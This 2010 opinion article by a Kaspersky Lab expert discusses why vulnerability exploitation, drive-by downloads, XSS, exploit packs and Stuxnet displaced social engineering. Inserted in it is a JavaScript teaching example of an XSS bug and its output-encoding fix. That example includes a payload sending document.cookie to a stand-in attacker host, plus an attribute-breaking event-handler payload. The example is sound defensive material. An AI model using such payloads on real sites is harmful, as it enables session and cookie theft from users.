The genuine threat to security

Why program vulnerabilities aren’t going anywhere.

Tags: Cyber crime, Kaspersky Lab, Malware
By Aleks Gostev. Published November 14, 2010

LoveLetter, Mydoom, Storm Worm and several thousand trojans and other programs have been infecting users’ computers for almost ten years now, most of them without any particularly complex technology or devious propagation method. Most types of protection can easily be bypassed, provided the cybercriminal persuades the user that a given file needs to be launched. Now, however, the situation has changed radically.

The main method of infecting a computer today is to attack it by exploiting one of a range of vulnerabilities. This applies to home and business machines alike.

There are many reasons for this shift, but the main one is that multiple vulnerabilities have recently been discovered in some of the most widely used programs, including Internet Explorer, Microsoft Office, Acrobat Reader and Flash, to name but a few.

This has led to the situation that exists today: the majority of infections now occur while the user simply goes about their business on the internet, via the now ubiquitous drive-by download, which has pushed the threat to a new level. Exploiting vulnerabilities has become an even more effective means of spreading malware than social engineering.

Many software companies whose products contain vulnerabilities appear to struggle to restructure their processes, both in reducing the number of vulnerabilities they ship and in how quickly and effectively they fix those that are reported.

The security situation of other popular internet resources, social networks in particular, is equally woeful. XSS vulnerabilities are being found in some of the most popular sites with alarming frequency, which adds yet another layer of threat to an already sizeable problem.
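As an added illustration of the XSS problem mentioned above (example code written for this page, not from the original article or from Kaspersky Lab): a comment renderer of the kind a social-networking site might expose, first with the untrusted display name concatenated straight into HTML, then with output encoding applied to every interpolated value. The function names, the two constructed payloads and the attacker.invalid hostname are assumptions made for the example; the small start-tag tokenizer at the end exists only to check the result and is not a general HTML parser.

```javascript
// Added example, not from the original article. Demonstrates a reflected/stored
// XSS bug in a comment renderer and the output-encoding fix, then checks both
// renderings with a tiny start-tag tokenizer (constructed for this example).

// Vulnerable: display name and body are concatenated straight into markup.
// A name such as <script>...</script>, or one containing a double quote,
// becomes live HTML in both the attribute and the text-node context.
function renderCommentUnsafe(displayName, body) {
  return '<div class="comment" data-author="' + displayName + '">' +
         '<b>' + displayName + '</b>: ' + body + '</div>';
}

// Encode for an HTML text node or a double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: every untrusted value is encoded at the point of output.
function renderCommentSafe(displayName, body) {
  const name = escapeHtml(displayName);
  return '<div class="comment" data-author="' + name + '">' +
         '<b>' + name + '</b>: ' + escapeHtml(body) + '</div>';
}

// Minimal tokenizer for the start tags in a rendered fragment. It respects
// double-quoted attribute values, which is what a naive regex check cannot do
// (an escaped payload still contains the text 'onmouseover=' as data).
function startTags(html) {
  const tags = [];
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    const attrRe = /([^\s=]+)(?:\s*=\s*"([^"]*)")?/g;
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] === undefined ? '' : a[2];
    }
    tags.push({ tag: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// True if the fragment contains a script element or an on* event handler
// attribute, i.e. injected content that the browser would execute.
function hasActiveContent(html) {
  return startTags(html).some((t) =>
    t.tag === 'script' || Object.keys(t.attrs).some((k) => k.startsWith('on')));
}

// Constructed payloads, one per injection context (hostname is an assumption).
const PAYLOAD_TEXT = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>';
const PAYLOAD_ATTR = '" onmouseover="alert(1)';

// Renders both payloads through both renderers and reports which ones
// yielded executable markup.
function demo() {
  return {
    unsafeTextInjected: hasActiveContent(renderCommentUnsafe(PAYLOAD_TEXT, 'hi')),
    unsafeAttrInjected: hasActiveContent(renderCommentUnsafe(PAYLOAD_ATTR, 'hi')),
    safeTextInjected: hasActiveContent(renderCommentSafe(PAYLOAD_TEXT, 'hi')),
    safeAttrInjected: hasActiveContent(renderCommentSafe(PAYLOAD_ATTR, 'hi')),
  };
}

console.log(demo());
```

The attribute payload is the instructive case: it carries no angle brackets, so a filter that only strips `<script>` passes it, yet in the unsafe renderer it closes the `data-author` value and adds an event handler. Encoding the double quote keeps the whole string inside the attribute value, which is why context-appropriate output encoding, not input filtering, is the fix.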

Thus the exploitation of vulnerabilities to spread malware and steal information is now extremely commonplace, and not at all the rarity it once was.

Right now, even cybercriminals without any real programming knowledge can use ready-made ’exploit packs’ to distribute trojans. This lets them reach far more machines than they could ever have reached through social engineering alone.

However, the most dangerous emerging trend is cyber warfare, the most high-profile case being the Stuxnet worm, first detected in the summer of 2010.

Its aim was to gain access to, and extract information from, the industrial control systems running Siemens Simatic WinCC SCADA software. Apart from its unusual functionality, the worm exploited a zero-day vulnerability in Windows in order to propagate itself. This vulnerability was known to the attackers at least half a year before security experts detected it, so we can only guess who has been using it and for what purpose. What is even more alarming is that a clash of interests between cybercriminals and governmental institutions can be expected in the field of industrial espionage.

Previously, cybercriminals’ attacks were largely limited to mass harassment of everyday users; only rarely did they succeed against financial organisations, payment systems and online shops, and their main aim was to gain access to user accounts. Over the course of its evolution, however, cybercrime has come full circle, returning to the point from which it started, but on a new and higher level.

Aleks Gostev is Kaspersky Lab’s chief security expert and specialises in IT and mobile malware.
